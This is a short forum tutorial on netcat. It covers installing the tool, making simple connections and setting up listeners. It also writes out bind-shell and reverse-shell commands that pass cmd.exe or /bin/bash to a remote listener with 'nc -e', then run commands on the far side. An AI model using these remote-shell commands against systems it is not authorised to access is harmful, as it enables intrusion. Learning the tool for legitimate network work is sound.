using netcat
Page 1 of 1
using netcat
More on youtube.com/watch?v=QBbzxuOinz0&feature=related
now for netcat install.
- Code:
sudo apt-get install -y netcat top
- Code:
nc -v ip
- Code:
-vn
or
- Code:
nc -vn ip 1234
bind to cmd
- Code:
nc -lvt ip 1234 -e cmd.exe
nc -vn ip 1234
send cmd shell to a listener
receive
- Code:
nc -lvp 1234
sending
- Code:
nc -vn ip port -e /bin/bash
now on receiving side type ls
type
- Code:
top
or
- Code:
ls
Last edited by jamied_uk on 26th May 2018, 15:13; edited 1 time in total
Re: using netcat
2018 Edition
Box Update Link (For The Code).
app.box.com/s/8tmrt1a6pz8ghvojac1uxjyj2t73rhvf
Box Update Link (For The Code).
app.box.com/s/8tmrt1a6pz8ghvojac1uxjyj2t73rhvf
Similar topics
» Sending Files Across Network With Netcat
» Secure Netcat For Windows & Linux
» Messeging With Netcat Script With Bash On Linux
» Message Netcat Bash Part 3 Auto Grabbing & Menu
» Questions Answered for Questions about nc (netcat) in Raspbian
» Secure Netcat For Windows & Linux
» Messeging With Netcat Script With Bash On Linux
» Message Netcat Bash Part 3 Auto Grabbing & Menu
» Questions Answered for Questions about nc (netcat) in Raspbian
Page 1 of 1
Permissions in this forum:
You cannot reply to topics in this forum